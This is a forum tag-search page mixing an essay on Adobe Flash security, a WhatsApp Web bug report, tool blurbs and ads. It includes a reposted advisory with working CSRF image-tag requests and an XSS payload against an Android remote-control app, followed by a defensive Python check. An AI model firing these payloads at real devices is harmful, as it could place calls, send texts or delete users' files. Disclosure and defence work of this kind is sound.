Search the Community

Showing results for tags 'web'.

  1. Oh, Adobe Flash. I knew you well, starting from when you were known as Macromedia Flash in the late 1990s. The dynamic web content you provided me was amazing. Streaming video over 56k would’ve been a major test of my patience, hence YouTube didn’t launch until 2005. But the games… Oh, the games! They were fun. Wait fifteen minutes to download, then five minutes of amusement could be had before it got tiring. Webmasters loved the razzle dazzle of Flash applets even more than JavaScript applets for tacky animated menus and the like. Back when websites had “Best viewed with Netscape,” or “Best viewed with Internet Explorer” icons on their home pages, some web developers really enjoyed one-upping each other in needless Flashiness. “Look ma, this ain’t GeoCities no more!”

As web developers started to emphasize function over gimmickry, they started to focus their energy on interesting and useful web apps and streaming video as opposed to taking the sentiment behind the old HTML <blink> tag way too far. With Flash, the possibilities seemed endless. If you could make a very good SWF applet, people really appreciated it, especially once most people had Flash plugins in their web browsers. And of course, Flash was necessary for YouTube. YouTube launched the same year Adobe bought Macromedia, 2005. YouTube was such a phenomenon that Google had the good sense to buy it a year later.

Adobe is good at developing creative tools, however proprietary they are. What they’re not good at is security. No bloody way! Security bugs are inevitable in all applications from developers both big and small. But they’re way more common in Adobe Acrobat and Adobe Flash than is typical for similar applications. One of the things I habitually do in my security hardening routine for both personal and professional client PCs is uninstall Acrobat and replace it with another PDF viewer, such as Foxit Reader, when the machine I’m working on runs Windows. Even though the end user doesn’t realize that I’ve given them a more secure application to open PDFs in, they always appreciate how their new application patches without popups, and gives them a better designed GUI, better in-browser functionality, and an overall better user experience.

I’m really happy to be able to say that now I can do the same thing to Flash as I do to Acrobat. Except I don’t have to install another application to replace it. All I’ve got to ask an end user is, “do you ever go to YouTube?” They’ve always said yes. The really computer illiterate end users don’t know what Flash is, nor do they know that they sometimes view YouTube videos as an embedded applet on a webpage that’s not hosted at youtube.com. Asking them if they enjoy other websites that use Flash is an exercise in futility. “Huh? Do I use Google or Foxfire?” (Why oh why do they call Firefox “Foxfire?” Explaining to them the difference between the Google search engine and the Google Chrome web browser has made me ruin my manicures here and there.) But I could usually assume that they needed Flash for YouTube most of the time. A few years ago, they really needed it for games in Facebook, as well.

The first nail in the coffin was mobile. The late Steve Jobs, although I strongly dislike the guy, was correct when he said, “Flash has not performed well on mobile devices. We have routinely asked Adobe to show us Flash performing well on a mobile device, any mobile device, for a few years now. We have never seen it.” Although Adobe really wanted to port Flash to mobile platforms, that effort was never successful. It was never available for iOS. It was available at times for Symbian, Palm OS, and webOS. It was available for some devices running Android versions 2.2 through 4.0.4. It never really seemed to catch on, once smartphones and tablets became the primary way for consumers to enjoy content from the Internet.

W3C started working on HTML 5 in 2004. It was usable for me to play around in starting in 2010. But I’m more of a web page developer than a web app developer, so my web development was focused on standards compliance and cross-browser and device compatibility rather than creating nifty things with the canvas element. Nonetheless, the introduction of the <video> tag made it a lot easier to embed video without Flash than ever before. And other new tags and functions in HTML 5, combined with sophisticated CSS and JavaScript use, rendered Flash unnecessary for dynamic apps, as well. HTML 5, when used by a competent developer, works just as well on mobile as it does on desktop platforms, and that was apparent well before HTML 5 became officially stable on October 28th, 2014. In fact, I can’t think of a more successful and widespread beta release off the top of my head. Unless you directly worked in web browser and engine development, October 28th would’ve been just another Tuesday.

Adobe announced that they had given up on developing Flash for mobile in November 2011. That well predated HTML 5’s stable release. In addition to games and other web apps using open standard alternatives to Flash, YouTube started to make HTML 5 compatible videos available in January 2010, via WebM and H.264. Also, there are native mobile apps for watching YouTube videos outside of the web. So, the thorough acceptance of cross-platform open standards, especially HTML 5, combined with everyone and their grandma using mobile devices and Adobe’s struggle with it, sealed Flash’s doom. Then, on January 27th of this year, YouTube announced that HTML 5 video is now default in Chrome, Internet Explorer 11, Safari 8, and the latest Firefox releases. If your browser uses one of the same rendering engines, such as the latest stable versions of WebKit and Trident, you’ll probably experience the same.

A Brief Summary of Adobe’s Security Problems

This is by far not a complete summary of all of the security problems Flash (and Acrobat) has had, but I’ll explain some of the major ones. In 2007, an Adobe (Acrobat) Reader bug exposed the local filesystems of users’ computers to anyone who knew how to exploit it.

Trojan Adobe Flash Player and Reader updates started to become prevalent in 2008. It’s been such a problem that when I see an update popup on a user’s machine, I assume it’s malicious until I determine otherwise. So, that’s been a huge problem for consecutive years now. How come all kinds of other applications, open and closed, from developers of all sizes can patch without popups users have to interact with, but Adobe can’t manage to do that? That’s a massive trojan vector, and there are two disastrous sides to that coin. The vast majority of end users lack my expertise, particularly in malware. A Flash or Reader update popup could be a trojan. Sometimes end users have had experience with Adobe trojans already, so someone like me may have advised them to exercise caution when they see such a popup. But the popup could necessitate interaction for a legitimate and very necessary security patch. So with end users unable to determine whether or not a popup is a trojan, not interacting with it could be the less secure rather than more secure thing to do.

In 2009, Symantec’s Internet Security Threat Report explained how Adobe, with Flash and Reader, had one of their most insecure years ever. Adobe’s Chuck Geschke was tremendously arrogant when he was interviewed by John Paczkowski about that.

Paczkowski: “Both Apple and Microsoft have said publicly now that Flash has issues with reliability, security, and performance. Do you think those complaints are legitimate?”

Geschke: “I think they’re old news. Go to our website and read the actual facts about Flash. We enumerate the facts about Flash there as we see them. They may have a different set of facts that they believe are accurate. It’s up to you to decide.”

Ummm, Mr. Geschke… Facts are never subjective by their very definition. Facts are facts, period. You sound like a bloody Scientologist. “Today, I feel like 2 + 2 = 5. It just feels right to me, but your mathematics professor may have a different set of facts they believe are accurate.” Here are the facts. This is what Symantec’s 2009 report actually said, and I hold them in much higher esteem than I do Adobe:

“In 2009, Symantec documented 321 vulnerabilities affecting plugins for web browsers. ActiveX technologies were affected by 134 vulnerabilities, which was the highest among the plugin technologies examined. Of the remaining technologies, Java SE had 84 vulnerabilities, Adobe Reader had 49 vulnerabilities, QuickTime had 27 vulnerabilities, and Adobe Flash Player was subject to 23 vulnerabilities. The remaining four vulnerabilities affected extensions for Firefox…

“Among the vulnerabilities discovered in 2009, a vulnerability affecting both Adobe Reader and Flash Player was the second most attacked vulnerability. This was also one of four zero-day vulnerabilities affecting Adobe plug-ins during 2009. Two of the vulnerabilities were in the top five attacked vulnerabilities for 2009. Additionally, Adobe vulnerabilities have been associated with malicious code attacks such as the Pidief.E Trojan.”

Ouch! And Adobe’s position as one of the most insecure major software vendors ever didn’t cease in 2009. It still isn’t “old news,” Mr. Geschke. Malicious PDFs were used to successfully attack Rackspace, Adobe, and Google in 2010. A remote access bug was discovered in Flash in 2011. When properly exploited, one could acquire full control of an affected client machine. Flash Player made it to the top of Symantec’s list of most exploitable plugins in 2012. In October 2013, Adobe was attacked, revealing the sensitive data of 2.9 million users. The sensitive data affected included credit card and debit card information.

The same day YouTube announced default HTML 5 video, January 27th, 2015, Adobe had to release a security patch for two really major Flash vulnerabilities. Independent security researcher Kafeine discovered vulnerability CVE-2015-0311. It allowed Flash to be used as a vector for malicious code injection which could, once again, give complete control of an affected machine to a blackhat. A security researcher named Bilou discovered CVE-2015-0312. It was very similar to CVE-2015-0311; it also enables remote code injection. And of course, with Adobe being Adobe, barely a week passed before fifteen vulnerabilities had to be addressed in a patch that released on February 5th. Yet again, these vulnerabilities enable remote malicious code injection and execution. If you’re still using Flash in Windows, OS X, and GNU/Linux, this is what you must know about eighteen additional CVE listings: “Users of Adobe Flash Player for Windows and OS X should update to Adobe Flash Player 16.0.0.305. Users of Adobe Flash Player Extended Support Release should update to Adobe Flash Player 13.0.0.269. Users of Adobe Flash Player for Linux should update to Adobe Flash Player 11.2.202.442. The Adobe Flash Player installed with Google Chrome, as well as Internet Explorer on Windows 8.x, will automatically update to version 16.0.0.305.”

I can safely assume that we’ll continue to learn about really major vulnerabilities that pertain to Flash and Reader for as long as those products continue to be developed by Adobe. I base that assumption not only on Adobe’s reputation and their tendency to take a head-in-the-sand approach to security, but also on Adobe’s patch management style. Their patches address vulnerabilities that are near the surface of their applications, rather than the really deep vulnerabilities at the center of their really old code bases. Way too much of the code is unchanged from the 1990s.

I’d love for a security firm with much greater resources than I have to do a really thorough penetration test of the most recent versions of Flash and Reader for Windows, OS X, and GNU/Linux. The reported findings would probably require a forest’s worth of pulp if printed on paper. So, yes, security vulnerabilities can be found in products from all developers. But Adobe is much worse than the norm. Alternative PDF viewers and creators are available for pretty much all mobile and desktop platforms. And open web standards such as HTML 5 have made Flash obsolete. Heck, I even use GIMP instead of Photoshop. Here’s my advice. Whether you’re an enterprise or a consumer, get Adobe out of your abode. Now you can do it for content creation and consumption. And it’s easy.

References
  • Still using Adobe Flash? Oh well, get updating: 15 hijack flaws patched - Shaun Nichols, The Register
  • YouTube flushes Flash for future flicks - Simon Sharwood, The Register
  • YouTube now defaults to HTML5 <video> - Richard Leider, YouTube Engineering and Developers Blog
  • Another day, yet another emergency Adobe Flash patch. Because that’s how we live now - Iain Thomson, The Register
  • Adobe has an epically abysmal security record - Jose Pagliery, CNN Money, Oct. 8, 2013
  • Adobe says hackers accessed data for 2.9 million customers - James O’Toole, CNN Money, http://money.cnn.com/2013/10/03/technology/security/adobe-hack/index.html?iid=EL
  • Thoughts on Flash - Steve Jobs, Apple.com, https://www.apple.com/hotnews/thoughts-on-flash/
  • Why You Should Ditch Adobe Shockwave - Brian Krebs, Krebs on Security, http://krebsonsecurity.com/2014/05/why-you-should-ditch-adobe-shockwave/
  • YouTube says HTML5 video ready for primetime, makes it default - Ron Amadeo, Ars Technica, http://arstechnica.com/gadgets/2015/01/youtube-declares-html5-video-ready-for-primetime-makes-it-default/
  • The tooth gnashing you hear is from Flash users installing a new 0day patch - Dan Goodin, Ars Technica, http://arstechnica.com/security/2015/01/those-teeth-gnashings-you-hear-are-flash-users-installing-a-new-0day-patch/
  • How secure is Flash? Here’s what Adobe won’t tell you - Ed Bott, ZDNet, http://www.zdnet.com/article/how-secure-is-flash-heres-what-adobe-wont-tell-you/
  • Adobe issues emergency Flash update for Windows and Mac - Dara Kerr, CNET, http://www.cnet.com/news/adobe-issues-emergency-flash-update-for-windows-and-mac/

Source
  2. Hello, from what I can see it seems you want quality web hosting with very good security. A friend and I managed to open a web hosting company called clear-host.com; we offer quality hosting with very good security.

What we offer:

Web Hosting
  • First package: FREE! Space: 500 MB, everything else unlimited. CronJob: Yes. Anti Flood / DDoS. Anti Shell / Hacking. Support: 24/7.
  • Second package: at 1.50 dollars. Everything unlimited, with the same security specifications.

Reseller Web
  • At 5.00 dollars. Everything unlimited, with the same security specifications.

We accept any type of site! We accept any type of payment (PayPal or top-up code).

EDIT: From now on payments will no longer be in Euro, because there were problems with PayPal; they will be in Dollars.

Link: Clear Host Romania - Shopping Cart

If there is any problem, please write here!
  3. http://express.ikoula.com/en/premium_hosting
  4. Last week, the most popular mobile messaging application WhatsApp finally arrived on the web — dubbed WhatsApp Web, but unfortunately it needs some improvements in its web version. An independent 17-year-old security researcher, Indrajeet Bhuyan, reported two security holes in the WhatsApp web client that in some way expose its users’ privacy. Bhuyan called the first hole the WhatsApp Photo Privacy Bug and the other the WhatsApp Web Photo Sync Bug. Bhuyan is the same security researcher who reported to us the vulnerability in the widely popular mobile messaging app which allowed anyone to remotely crash WhatsApp by sending a specially crafted message of just 2kb in size, resulting in the loss of conversations.

WhatsApp Photo Privacy Bug

According to him, the new version of WhatsApp Web allows us to view a user’s profile image even if we are not on the contact list of that user. Even if the user has set the profile image privacy setting to "Contacts Only," the profile picture can be viewed by people outside their contacts as well. Basically, if we set the profile image privacy to Contacts Only, only the people in our contact list are able to view our profile picture, and nobody else. But this is not the case with WhatsApp Web. You can watch how this works in the video demonstration below:

WhatsApp Web Photo Sync Bug

The second security hole points out the WhatsApp Web Photo Syncing functionality. Bhuyan noticed that whenever a user deletes a photo that was sent via the mobile version of the WhatsApp application, the photo appears blurred and can’t be viewed. However, the same photo, which has already been deleted by the user from the mobile WhatsApp version, can be accessed by WhatsApp Web, as the photo does not get deleted from its web client, revealing the fact that the mobile and web clients of the service are not synced properly. You can also watch the video demonstration on this as well:

This is no surprise, as WhatsApp Web was introduced just a couple of days before, and these small security and implementation flaws could be expected at this time; some other bugs could also be revealed in the near future. However, the company will surely fix the issues and will definitely make its users’ messaging experience secure. Partnered with Open Whisper Systems, WhatsApp recently made end-to-end encryption a default feature on the Android platform, stepping a way forward for the online privacy of its users around the world.

-> Source: 17-Year-Old Found Bugs in WhatsApp Web and Mobile App - Hacker News
  5. My collection of PDFs, most of them current; updated regularly; enjoy! https://mega.co.nz/#F!VEYhhTQQ!0hp5FtWcHDCtRT5OjjWRUg
  6. XSS or Cross Site Scripting is a web application vulnerability that occurs when untrusted data from the user is processed by the web application without validation and is reflected back to the browser without encoding or escaping, resulting in code execution at the browser engine.

Types of XSS:
  • Reflected or Non-Persistent XSS
  • Stored or Persistent XSS
  • DOM based XSS
  • mXSS or Mutation XSS

Read more: http://dl.packetstormsecurity.net/papers/general/ultimate-xss.pdf
  7. Document Title:
===============
Remote Web Desktop Full 5.9.5 - Multiple Vulnerabilities

References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1409

Release Date:
=============
2015-01-19

Vulnerability Laboratory ID (VL-ID):
====================================
1409

Common Vulnerability Scoring System:
====================================
2.4

Product & Service Introduction:
===============================
Remote Web Desktop enables you to remotely manage & control your Android device from the computer web browser over a wireless connection.
(Copy of the Vendor Homepage: https://play.google.com/store/apps/details?id=net.xdevelop.rmp )

Abstract Advisory Information:
==============================
An independent vulnerability laboratory researcher discovered multiple web vulnerabilities in the Remote Web Desktop Full v5.9.5 Android application.

Vulnerability Disclosure Timeline:
==================================
2015-01-19: Public Disclosure (Vulnerability Laboratory)

Discovery Status:
=================
Published

Affected Product(s):
====================
SmartDog Studio HK
Product: Remote Web Desktop Full 5.9.5

Exploitation Technique:
=======================
Remote

Severity Level:
===============
Medium

Technical Details & Description:
================================
Multiple cross site request forgery and cross site scripting vulnerabilities have been discovered in the Remote Web Desktop Full 5.9.5 Android mobile web-application. The mobile web-application is vulnerable to a combination of cross site request forgery and cross site scripting attacks.

1.1 The cross site scripting vulnerabilities are located in the `to` value of the `sendSMS.json` file in the send sms function. The attacker needs to `Create new a contact` or `Create a contact group` with a malicious payload as name to inject. The execution occurs after the refresh inside of the main message module.

Request Method(s):
[+] [GET]

Vulnerable Parameter(s):
[+] to

1.2 The cross site request forgery vulnerabilities are located in the `makeCall.json`, `sendSMS.json`, `addTextFile.json`, `deleteFile.json` files. Remote attackers are able to prepare specially crafted URLs that execute client-side requests to execute application functions (delete, add, call, send).

Request Method(s):
[+] [GET]

Vulnerable Parameter(s):
[+] makeCall.json
[+] sendSMS.json
[+] addTextFile.json
[+] deleteFile.json

Proof of Concept (PoC):
=======================
1.1 The cross site request forgery vulnerability can be exploited by remote attackers without a privileged application user account and with medium or high user interaction.
For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue.

Call Phone Number
<img src="http://localhost:8999/makeCall.json?phoneNo=11111111111" width="0" height="0" border="0">

--- PoC Session Logs [GET] (Execution) ---
GET /makeCall.json?phoneNo=11111111111 HTTP/1.1
Host: 192.168.1.3:8999
User-Agent: Mozilla/5.0 (Windows NT 5.2; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: fr,fr-fr;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: RemoteMobileSession=-658409909345357946
Connection: keep-alive

HTTP/1.1 200 OK
Cache-control: no-cache
Content-length: 4

true

Send SMS:
--- PoC Session Logs [GET] (Execution) ---
<img src="http://localhost:8999/sendSMS.json?to=333&content=Hello" width="0" height="0" border="0">

GET /sendSMS.json?to=333&content=Hello HTTP/1.1
Host: 192.168.1.3:8999
User-Agent: Mozilla/5.0 (Windows NT 5.2; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: fr,fr-fr;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: RemoteMobileSession=-658409909345357946
Connection: keep-alive

HTTP/1.1 200 OK
Cache-control: no-cache
Content-length: 30

SMS to 333 sent successfully

Create File:
--- PoC Session Logs [GET] (Execution) ---
<img src="http://localhost:8999/addTextFile.json?id=/folder&name=file" width="0" height="0" border="0">

GET /addTextFile.json?id=/folder/&name=file HTTP/1.1
Host: 192.168.1.3:8999
User-Agent: Mozilla/5.0 (Windows NT 5.2; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: fr,fr-fr;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: RemoteMobileSession=-658409909345357946
Connection: keep-alive

HTTP/1.1 200 OK
Cache-control: no-cache
Content-length: 26

/folder/file

Delete File:
<img src="http://localhost:8999/deleteFile.json?id=/file" width="0" height="0" border="0">

GET /deleteFile.json?id=%2Fmnt%2Femmc%2Faissak%7C HTTP/1.1
Host: 192.168.1.3:8999
User-Agent: Mozilla/5.0 (Windows NT 5.2; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: fr,fr-fr;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: RemoteMobileSession=-658409909345357946
Connection: keep-alive

HTTP/1.1 200 OK
Cache-control: no-cache
Content-length: 4

true

Reference: http://localhost:8999/

1.2 The application-side input validation web vulnerabilities can be exploited by a local low privileged application account or by remote attackers with low user interaction.
For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue.

Application-Side Cross Site Scripting
--- PoC Session Logs [GET] (Execution) ---
GET /sendSMS.json?to=%3Cimg+src%3Dx+onerror%3Dalert(%2FXSS%2F)%3E&content=%3Cimg+src%3Dx+onerror%3Dalert(%2FXSS%2F)%3E&uid=1421297818963 HTTP/1.1
Host: 192.168.1.3:8999
User-Agent: Mozilla/5.0 (Windows NT 5.2; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: fr,fr-fr;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: text/plain; charset=utf-8
Referer: http://192.168.1.3:8999/
Cookie: RemoteMobileSession=-6603034196170561541
Connection: keep-alive

HTTP/1.1 200 OK
Cache-control: no-cache
Content-length: 68

SMS to <img src=x onerror=alert(/XSS/)> sent failed: Unknown Error

--- PoC Session Logs [GET] (Execution) ---
Create new a contact or a contact group with the payload as name "<img src=x onerror=alert(/XSS/)>" and click the contact button to save

Reference: http://localhost:8999/

Security Risk:
==============
1.1 The security risk of the cross site request forgery web vulnerabilities is estimated as medium. (CVSS 2.2)
1.2 The security risk of the application-side input validation web vulnerability is estimated as medium. (CVSS 2.4)

Credits & Authors:
==================
Hadji Samir s-dz@hotmail.fr

Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material.

Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.

Source: Remote Web Desktop Full 5.9.5 Cross Site Request Forgery / Cross Site Scripting - Packet Storm
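The XSS definition in result 6 and the advisory in result 7 describe the same two server-side defects: state-changing endpoints (`makeCall.json`, `sendSMS.json`, `addTextFile.json`, `deleteFile.json`) that accept a bare GET from any origin, and a `to` value echoed into the response unescaped. The Python below is an added illustration of the corresponding checks, not code from the advisory, the vendor or the forum posts. It assumes the application is only ever served from the origin seen in the advisory's `Host` header (`http://192.168.1.3:8999`) and that the server keeps a per-session CSRF token; the request dictionaries in the `__main__` block are constructed to mirror the advisory's session logs.

```python
import hmac
import html
import secrets
from urllib.parse import urlsplit

# Routes the advisory lists as reachable with a plain GET and no anti-CSRF check.
STATE_CHANGING_ROUTES = {
    "/makeCall.json", "/sendSMS.json", "/addTextFile.json", "/deleteFile.json",
}
# Assumption: the app is only served from this origin (the advisory's Host header).
TRUSTED_ORIGIN = "http://192.168.1.3:8999"


def new_csrf_token():
    """Per-session secret the server stores and embeds in its own forms."""
    return secrets.token_urlsafe(32)


def _origin_of(url):
    """Reduce an Origin/Referer value to scheme://host[:port] for an exact match,
    so a prefix lookalike such as http://192.168.1.3:8999.attacker.example fails."""
    parts = urlsplit(url)
    if not parts.scheme or not parts.netloc:
        return None
    return "%s://%s" % (parts.scheme.lower(), parts.netloc.lower())


def check_request(method, target, headers, form, session_csrf_token):
    """Decide whether a request may reach a state-changing route.

    Returns (allowed, reason). The advisory's PoC is a GET fired by an <img> tag
    on a foreign page: it fails every one of the three checks below.
    """
    route = urlsplit(target).path
    if route not in STATE_CHANGING_ROUTES:
        return True, "not a state-changing route"
    if method.upper() != "POST":
        return False, "state change requires POST, got %s" % method
    origin = headers.get("Origin") or headers.get("Referer")
    if origin is None or _origin_of(origin) != TRUSTED_ORIGIN:
        return False, "missing or foreign Origin/Referer"
    token = form.get("csrf_token", "")
    if not session_csrf_token or not hmac.compare_digest(token, session_csrf_token):
        return False, "CSRF token missing or mismatched"
    return True, "ok"


def render_sms_status(to, sent):
    """Echo the user-supplied `to` value the way the vulnerable response does,
    but HTML-escaped so a payload such as <img src=x onerror=...> is inert text."""
    status = "sent successfully" if sent else "sent failed"
    return "SMS to %s %s" % (html.escape(to, quote=True), status)


if __name__ == "__main__":
    # Constructed requests mirroring the advisory's session logs.
    token = new_csrf_token()
    forged = check_request("GET", "/makeCall.json?phoneNo=11111111111",
                           {"Host": "192.168.1.3:8999"}, {}, token)
    legit = check_request("POST", "/sendSMS.json", {"Origin": TRUSTED_ORIGIN},
                          {"to": "333", "content": "Hello", "csrf_token": token}, token)
    print("forged img-tag GET ->", forged)
    print("same-origin POST with token ->", legit)
    print(render_sms_status("<img src=x onerror=alert(/XSS/)>", False))
```

The three checks are deliberately layered: requiring POST alone does not stop a cross-site form submission, and an Origin check alone fails when a browser omits the header, so the per-session token is what ultimately binds the request to the user's own page. Escaping at output time, rather than filtering the input, is what makes the stored variant (a contact name containing the payload) harmless as well.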
  8. WebSurgery is a suite of tools for security testing of web applications. It was designed for security auditors to help them with web application planning and exploitation. The suite currently contains a spectrum of efficient, fast and stable web tools (Crawler, Bruteforcer, Fuzzer, Proxy, Editor) and some extra functionality tools (Scripting Filters, List Generator, External Proxy). Download: Sunrise Technologies
  9. ModSecurity™ is an open source, free web application firewall (WAF) Apache module. With over 70% of all attacks now carried out over the web application level, organizations need all the help they can get in making their systems secure. Download: ModSecurity: Download Code
  10. The OWASP WebSpa Project is a Java web knocking tool for sending a single HTTP/S request to your web server in order to authorize the execution of a premeditated Operating System (O/S) command. It provides a cryptographically protected "open sesame" mechanism on the web application layer, comparable to well-known port-knocking techniques. Download: https://www.owasp.org/index.php/OWASP_WebSpa_Project
  11. After I got bored of books and codeaca, in the developers section at Google I found this: Udacity. You can learn: Mathematics, Physics, Psychology, "Business" (Economics/Entrepreneurship), and programming (web + desktop). Have fun.
  12. I want to mount a camera (but I don't know which camera) and connect it to my site, like: http://buzaucity.ro/index.php?option=com_wrapper&view=wrapper&Itemid=115
  13. Fi8sVrs

    CutyCapt

    CutyCapt is a small cross-platform command-line utility to capture WebKit's rendering of a web page into a variety of vector and bitmap formats, including SVG, PDF, PS, PNG, JPEG, TIFF, GIF, and BMP. See IECapt for a similar tool based on Internet Explorer.

    Samples
    Here are some samples of CutyCapt generated renderings:
    - PNG Snapshot of http://digg.com
    - PNG Snapshot of css Zen Garden: The Beauty in CSS Design
    - SVG Snapshot of MSDN Silverlight Dev Center
    - PDF Snapshot of MSDN Silverlight Dev Center

    Status
    CutyCapt has a number of known quirks, most of which are caused by problems with Qt and/or WebKit. For example, while plugin support can be enabled, and the plugins execute properly, their rendering cannot be captured on some platforms. Use with caution.

    Requirements
    CutyCapt depends on Qt 4.4.0+.

    Download
    Help wanted! Previously I have used MinGW to make a static Qt build and correspondingly single-file CutyCapt executables for Windows. However, MinGW no longer supports single-file executables for threaded applications, they require to re-distribute a DLL instead, and Qt no longer supports static builds of QtWebkit. Similarly, if I just used Visual Studio 2010, as I do for normal development, proper builds would have to redistribute Microsoft runtime DLLs. Anyone who wants to prepare CutyCapt.exe + *.DLL builds is most welcome to join the project to do so, or alternatively provide them externally which I would then link from here. Let me know if you are interested. Thanks.
    - CutyCapt-Win32-2010-04-26.zip (7MB, .exe for Win32 systems)
    - CutyCapt-Win32-2008-06-11.zip (6MB, .exe for Win32 systems)

    Source code
    The source code is available in the SVN repository (download tarball).

    Usage
    Open a command prompt and ask for help:

    % CutyCapt --help
    -----------------------------------------------------------------------------
    Usage: CutyCapt --url=http://www.example.org/ --out=localfile.png
    -----------------------------------------------------------------------------
    --help                         Print this help page and exit
    --url=<url>                    The URL to capture (http:...|file:...|...)
    --out=<path>                   The target file (.png|pdf|ps|svg|jpeg|...)
    --out-format=<f>               Like extension in --out, overrides heuristic
    --min-width=<int>              Minimal width for the image (default: 800)
    --min-height=<int>             Minimal height for the image (default: 600)
    --max-wait=<ms>                Don't wait more than (default: 90000, inf: 0)
    --delay=<ms>                   After successful load, wait (default: 0)
    --user-styles=<url>            Location of user style sheet, if any
    --header=<name>:<value>        request header; repeatable; some can't be set
    --method=<get|post|put>        Specifies the request method (default: get)
    --body-string=<string>         Unencoded request body (default: none)
    --body-base64=<base64>         Base64-encoded request body (default: none)
    --app-name=<name>              appName used in User-Agent; default is none
    --app-version=<version>        appVers used in User-Agent; default is none
    --user-agent=<string>          Override the User-Agent header Qt would set
    --javascript=<on|off>          JavaScript execution (default: on)
    --java=<on|off>                Java execution (default: unknown)
    --plugins=<on|off>             Plugin execution (default: unknown)
    --private-browsing=<on|off>    Private browsing (default: unknown)
    --auto-load-images=<on|off>    Automatic image loading (default: on)
    --js-can-open-windows=<on|off> Script can open windows? (default: unknown)
    --js-can-access-clipboard=<on|off> Script clipboard privs (default: unknown)
    --print-backgrounds=<on|off>   Backgrounds in PDF/PS output (default: off)
    -----------------------------------------------------------------------------
    <f> is svg,ps,pdf,itext,html,rtree,png,jpeg,mng,tiff,gif,bmp,ppm,xbm,xpm
    -----------------------------------------------------------------------------

    Build Instructions
    If your system is set up to compile Qt applications, building CutyCapt should be a simple matter of checking out the source code and running qmake and your version of make. As an example, if you are running Ubuntu Hardy Heron and have configured the system to use packages from hardy-backports, the following should do:

    % sudo apt-get install subversion libqt4-webkit libqt4-dev g++
    % svn co https://cutycapt.svn.sourceforge.net/svnroot/cutycapt
    % cd cutycapt/CutyCapt
    % qmake
    % make
    % ./CutyCapt --url=http://www.example.org --out=example.png

    Using CutyCapt without X server
    You cannot use CutyCapt without an X server, but you can use e.g. Xvfb as light-weight server if you are not running an interactive graphical desktop environment. For example, you could use:

    % xvfb-run --server-args="-screen 0, 1024x768x24" ./CutyCapt --url=... --out=...

    Author
    Björn Höhrmann bjoern@hoehrmann.de
    CutyCapt - A Qt WebKit Web Page Rendering Capture Utility
  14. It's a plugin for PowerPoint, useful for creating e-learning content in SCORM, web and Flash formats, especially for e-learning platforms like Moodle, simple web pages in HTML5, graphics, all with the option of being optimized for mobile devices. It keeps the effects, the animations, pretty much the whole format of the presentation; it can be exported to various formats, content only for graphics or web-oriented, and there's also the option with a player for e-learning content. Free licenses are offered for Beta Testers.
      _________________________________________________
      Create interactive eLearning courses with narrations in Flash and HTML5 and view them on computers, Android devices and iPads. See what's new. Publish to Flash and HTML5: Create interactive courses and presentations for all computers, Android tablets and iPads with a single mouse-click. iSpring Pro 7 allows you to convert your PowerPoint content into Flash, HTML5 or Flash+HTML5 in a combined mode. Now you can develop an eLearning package that will be supported on all devices.
      Source: IspringSolutions
  15. http://www.youtube.com/watch?v=3mch44il4QE Description: Fimap is a python tool which can find, prepare, audit, exploit and even google automatically for local and remote file inclusion bugs in webapps. fimap should be something like sqlmap just for LFI/RFI bugs instead of sql injection. It's currently under heavy development but it's usable. from: securitytube.net
  16. Web directory submission offer: I offer submission to 600 foreign web directories for the price of 10 euro via PayPal; the first 3 who reply to this post will get an offer of 3 euro for the 600 web directories, to confirm that it's real. Submission will be to 600 web directories, automatic and semi-automatic, on web directories with PR 2, 3, 4 and some with 5. Those interested, PM me or write in this topic. If I posted this topic in the wrong place (since I didn't know where to put it), I ask the admins to excuse me and move it where it belongs.
  17. wvw

    Perl books

    Advanced Perl Programming, 2nd Edition [2005]
    Extending and Embedding Perl [2003]
    Extreme Perl [2004]
    Higher-Order Perl: Transforming Programs with Programs [2005]
    Mastering Algorithms with Perl [1999]
    Mastering Perl [2007]
    Perl Debugged [2001]
